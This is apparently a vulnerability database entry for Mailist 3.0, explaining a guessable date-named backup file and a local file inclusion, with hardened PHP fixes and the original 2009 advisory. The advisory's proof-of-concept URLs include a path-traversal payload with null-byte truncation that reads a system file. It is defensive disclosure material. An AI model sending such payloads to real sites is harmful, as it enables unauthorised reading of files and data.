Vendor: Mailist
Discovered by: SirGod
CVSS: 8.8 (HIGH)
Title: Insecure Backup/Local File Inclusion
CWE: 98
Product Name: Mailist
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE: N/A
CPE: a:ninjadesigns:mailist
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Mailist 3.0 Insecure Backup/Local File Inclusion

The vulnerable code in admin.php copies maillist.php to a backup file whose name is built only from the output of date("jnY"), so anyone who knows, or can guess, the date on which the backup was taken can request the file directly from the backups/ directory. The vulnerable code in send.php passes the load parameter to include() without any validation, which allows local file inclusion; the ".txt" suffix the code appends can be cut off by adding %00 (a null byte, which older PHP versions treated as a string terminator) to the end of the URL.

Mitigation:

Validate user input (here the load parameter) against the set of file names the application actually expects before using it in a file operation, and do not derive backup file names from guessable values such as the current date.
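A hardened rewrite of the admin.php and send.php snippets quoted in the raw advisory below, added here as an example and not code from the Mailist project; the outbox directory, the backup directory being outside the web root, and reading load from $_GET are assumptions.

```php
<?php
// Added example (not Mailist code): hardened versions of the two vulnerable snippets.

// send.php replacement: accept only a plain outbox name and resolve it inside outbox/.
function safe_outbox_path(string $load, string $outboxDir): ?string
{
    // Allow-list: letters, digits, '-' and '_' only. This rejects "../", a NUL
    // byte (%00) and every other path character before the file system sees it.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $load)) {
        return null;
    }
    $base = realpath($outboxDir);
    $path = realpath($outboxDir . DIRECTORY_SEPARATOR . $load . '.txt');
    // realpath() is false for a missing file; also require the resolved path
    // to stay under the outbox directory (defence in depth behind the regex).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// admin.php replacement: the backup name is unguessable and $backupDir is
// assumed to be outside the web root (e.g. a sibling of the document root).
function make_backup(string $source, string $backupDir): ?string
{
    // date("jnY") leaves an attacker roughly 365 candidate names per year;
    // 16 random bytes do not.
    $name   = date('Ymd') . '-' . bin2hex(random_bytes(16)) . '.txt';
    $target = rtrim($backupDir, '/') . '/' . $name;
    if (!is_dir($backupDir) || !copy($source, $target)) {
        return null;
    }
    chmod($target, 0600); // readable by the web server account only
    return $target;
}

// Usage: read the parameter explicitly instead of relying on register_globals,
// and reject non-string values such as load[]=x.
$load = (isset($_GET['load']) && is_string($_GET['load'])) ? $_GET['load'] : '';
$path = safe_outbox_path($load, __DIR__ . '/outbox');
if ($path === null) {
    http_response_code(400);
    exit('Invalid message name.');
}
readfile($path); // serve the stored message as data rather than include()-ing it
```

If the outbox entries must still be include()d, the allow-list alone already blocks the traversal; readfile() is used here because the files are plain text, not PHP.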

Exploit-DB raw data:

#############################################################################################
[+] Mailist 3.0 Insecure Backup/Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] www.hellzone.info
[+] www.anti-intruders.org
#############################################################################################

[+] Homepage : http://ninjadesigns.co.uk/

[+] Download : http://ninjadesigns.co.uk/enter/mailist.zip


[+] Insecure Backup

 - Vulnerable code in admin.php


---------------------------------------------------------------------


if (isset($_GET['backup'])){
	echo "<br>";
	$file = 'maillist.php';
	$newfile = 'backups/'.date("jnY").'.txt';
	copy($file, $newfile);
	echo 'Successfully backed up. (backups/'.$newfile.')<br>';
	echo '<a href="'.$_SERVER['PHP_SELF'].'">Hide</a><br>';
}


----------------------------------------------------------------------

 We can see how it creates the backup : $newfile = 'backups/'.date("jnY").'.txt';
 The date() function is used.

    n - Numeric representation of a month, without leading zeros
    j - Day of the month without leading zeros
    Y - A full numeric representation of a year, 4 digits

 So we can guess the database backup if we know when it was created.

   Example : 622009.txt

        6 - the day without leading 0
        2 - the month without leading 0
        2009 - the year

   PoC :  http://127.0.0.1/path/backups/622009.txt



[+] Local File Inclusion


 - Vulnerable code in send.php :

---------------------------------------------------------------------

if(isset($load)){

include("outbox/".$load.".txt");
}


---------------------------------------------------------------------

 Example :

   http://127.0.0.1/path/send.php?load=[Local File]%00

 PoC :

    http://127.0.0.1/path/send.php?load=../../../../boot.ini%00



#############################################################################################

# milw0rm.com [2009-02-06]